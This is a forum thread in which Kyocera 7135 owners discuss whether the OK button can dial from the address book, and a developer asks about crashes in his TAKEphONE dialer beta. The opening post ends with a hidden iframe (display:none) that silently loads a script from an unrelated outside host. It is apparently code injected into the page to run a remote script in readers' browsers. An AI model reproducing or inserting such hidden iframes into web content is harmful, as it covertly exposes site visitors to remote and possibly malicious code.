+ Reply to Thread
Page 1 of 2 1 2 LastLast

Dialing From Address Book "without" Hitting Send Key?

I've had my phone for 3 days and I was able to do a search in the address book (from phone standby without stylus) and "OK" my way all the way through until I selected a # to dial and it would dial it. I never hit the green send key.

For some reason, I can't now. It just goes to the editing screen.

I've done some soft resets and 3 hard resets....

Is this a major glitch or something? There was another thread that was similar but went to another topic.

Being able to dial with just hitting OK was a major reason for me liking the phone...

Any way to change it???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hmmmm. Whenever I hit "o.k." while in an address, it always takes me to the editing screen. I've never known it any other way.
    ~'kito
    pdaPhoneHome Moderator

You shouldn't be able to dial by hitting the OK button. You navigate to the number and then hit send. If you hit the OK button, it will take you to the editing screen. This is how it's designed.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Re: Dialing From Address Book "without" Hitting Send Key?

Originally posted by RUYORK
    until I selected a # to dial and it would dial it. I never hit the green send key.

For some reason, I can't now. It just goes to the editing screen.
    Could you clarify what you mean by "select a #"? Are you tapping it with the stylus or pressing the OK button?

This is what I have noticed,

If you tap on the name of the entry (left side of screen) you are taken to the entry screen from which you can edit

If you tap on the number of the entry (right side of screen) it dials the number (if the phone is on that is)

If there is more than one number for the entry you can tap the drop down arrow and change the displayed number....The number itself must be tapped to dial.

-Chuck

When I first got my phone, I was able to hit ok all the way down until the number was selected and it would actually dial the number by just hitting ok. I never had to hit the green send key.

That's weird, I thought someone else may have had the same problem...

I can see using the stylus to edit but I really don't think it's needed by hitting the ok button because you really need to pull out the stylus to edit...

The only think I can think of that may be similar to "OK"ing your way to a phone call is calling a number from the "Recent Calls" list. If you are on the main phone screen, "Recent Calls" is already highlighted, then you hit "OK" to enter the list of recent calls. YOu can then move up and down the list a hit "OK" to go into the detail screen for that call. Pressing "OK" again will then call the number. Could you have been mistaken in your memory, and maybe actually called from the recent calls list instead of the address book?

Originally posted by kada
    The only think I can think of that may be similar to "OK"ing your way to a phone call is calling a number from the "Recent Calls" list. If you are on the main phone screen, "Recent Calls" is already highlighted, then you hit "OK" to enter the list of recent calls. YOu can then move up and down the list a hit "OK" to go into the detail screen for that call. Pressing "OK" again will then call the number. Could you have been mistaken in your memory, and maybe actually called from the recent calls list instead of the address book?
    Good point calling me on that one but I just did it (recent calls) and I am almost 100% positive I could have dialed from the addy book.

The reason I am so positive is because I tried to do it last night and it went to the edit screen.

I am a pretty sharp kid and am mistaken a lot but this I am almost positive about this.

Could I have a newer software and it defaulted back to another option?

Does Kyocera list software updates and bug fixes for this phone?

Maybe you had a problem before and now it's not doing it and just performing as defined.

The reason the OK button takes you to the edit screen instead of dialing the number is so that you can see the rest of the content for the address book entry. Say you want to quickly look up someone's address without pulling out the stylus, you can get down to that level pretty quickly one-handed. I use it this way all the time. And once you're done, you hit the OK button again to get back to the address book. I think the 6035 acted the same way with the jog dial.

Since Kyocera's documentation sucks, it takes a little experimenting to find out how some things work and how to make them work for you.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    Maybe you had a problem before and now it's not doing it and just performing as defined.

The reason the OK button takes you to the edit screen instead of dialing the number is so that you can see the rest of the content for the address book entry. Say you want to quickly look up someone's address without pulling out the stylus, you can get down to that level pretty quickly one-handed. I use it this way all the time. And once you're done, you hit the OK button again to get back to the address book. I think the 6035 acted the same way with the jog dial.

Since Kyocera's documentation sucks, it takes a little experimenting to find out how some things work and how to make them work for you.
    The nice thing was that all the information (most) was displayed and I could select the address and just hit ok.

I use the fingerdial now anyway, it works pretty good. I didn't like takephone too much...

I didn't like takephone too much...
    Forgive me for barging in, but - what did you not like ?
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Originally posted by TAKEphONE
    Forgive me for barging in, but - what did you not like ?
    I installed the demo of both and fingerdial didn't cause the fatal reset unlikr takephone.

Fingerdial is nice and simple.

I didn't really take to takephone due to initial impression of interface.

Just personal preference. Maybe I'll try it again but I don't know when because I am probably going to stay with fingerdial.

RUYORK,

I am able to dial from the book by just touching the number also. No send button needs to be hit. My phone is about a week old. I got it from the PA warehouse. That's by just using the touchscreen. The 'OK' button does what everyone elses seems to do.

I installed the demo of both and fingerdial didn't cause the fatal reset unlikr takephone.
    I guess you used version 4.64 of TAKEphONE, which is the one downloadable at PalmGear/Handango or at my site.

This version indeed did not work with the 7135, due to compatibility issues with the Kyocera SDK.

I have since made a newer version (currently at final beta), which does support the 7135 fully, including using the phone keypad to search (in stead of using the on-screen buttons), and the "OK" button to dial, displaying speed-dial and call-history, etc.

You can all try it at my beta page.
    Shimon Shnitzer
    Maker of TAKEphONE -

I tried the version of TakePhone from the Beta page and it's the ONLY time my phone has ever crashed and required a hard reset. I uninstalled it and everything has been fine.

I guess you used version 4.64 of TAKEphONE, which is the one downloadable at PalmGear/Handango or at my site.

This version indeed did not work with the 7135, due to compatibility issues with the Kyocera SDK.

I have since made a newer version (currently at final beta), which does support the 7135 fully, including using the phone keypad to search (in stead of using the on-screen buttons), and the "OK" button to dial, displaying speed-dial and call-history, etc.

You can all try it at my beta page.
    The guys at DataViz said they got that API to you on making TakePhone point to InBox to Go for e.mail. How's that coming? I hope it's in the final release.

Originally posted by slorandy
    I tried the version of TakePhone from the Beta page and it's the ONLY time my phone has ever crashed and required a hard reset. I uninstalled it and everything has been fine.
    I know I'm being a nag, and I know this may be bad publicity for me, but - can you tell me what version it was ?
    Shimon Shnitzer
    Maker of TAKEphONE -

Originally posted by Peter
    The guys at DataViz said they got that API to you on making TakePhone point to InBox to Go for e.mail. How's that coming? I hope it's in the final release.
    Hi,

The last email I got from them was one saying they might have something for me by last week.

I have emailed them just now asking if they do have something - maybe they forgot about me - being busy with the release of BeyondContacts...
    Shimon Shnitzer
    Maker of TAKEphONE -

Hi,

The last email I got from them was one saying they might have something for me by last week.

I have emailed them just now asking if they do have something - maybe they forgot about me - being busy with the release of BeyondContacts...
    That could be --- "busy with the release of Beyond Contacts." BTW, that program does not seem all that hot for smartphones. One of their sales guys told me that there would be no way to dial out from Beyond Contacts --- although I challenged him on this as I think any number you can highlight you can dial by pressing the send button. It's a built-in feature of the 7135.

Thanks for sending the e.mail prompting them for the necessary tools (API) to make TakePhone the perfect program for me.

I downloaded it off your website last Friday (http://www.shsh.com/beta/). I remembered it ended in xe, but don't know if it was 5.04 or not.